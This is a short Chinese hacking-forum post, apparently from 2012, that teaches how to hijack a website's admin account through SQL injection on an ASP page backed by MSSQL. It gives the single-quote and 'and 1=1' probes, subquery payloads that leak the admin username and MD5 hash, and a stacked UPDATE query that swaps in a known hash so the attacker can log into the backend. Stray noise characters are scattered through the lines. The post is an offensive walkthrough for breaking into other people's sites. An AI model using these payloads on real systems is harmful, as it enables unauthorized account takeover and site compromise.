经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
, C# o5 i4 Y$ r; I' q1 k可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
3 X7 j5 f( J" Y. g) \. i, X i( ~$ M测试如下:8 u0 E; u9 l8 k4 @0 ]
http://www.tmdsb.com/news.asp?id=121' S/ C4 Q! q. m
在地址后输入单引号,显示
7 y# F$ M0 O: a: T$ u* KMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’
& j8 i; a; C B字符串 ’’’ 之前有未闭合的引号" b# F. L$ ]8 O
/news/tmdws.asp,行63 T! Y( N/ G# b/ u9 I2 q
说明没有过滤单引号且数据库是MSSQL.
. }% g! @- D# h1 s6 yand 1=1正常。and 1=2出错。肯定存在注入
6 n- B$ f& d: h6 g接着输入" `0 t& H/ F( I) ]6 H
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)% x$ W; p. J- H6 y
得到帐号为:admin3 X& P. G2 o8 K6 {# V9 J1 t7 }3 [
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
6 H& R! Q4 b1 W/ q5 ]' ?得到密码为:a4716077c2ba075c
3 h/ l- _- L) Y! J. W6 P4 |接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
; x8 Z/ ~3 h, u) m2 X N4 I命令如下 :
) c6 G# {. D) H1 e N& F+ V# W;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–' C" R* P. \/ q, y$ T% g! t
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41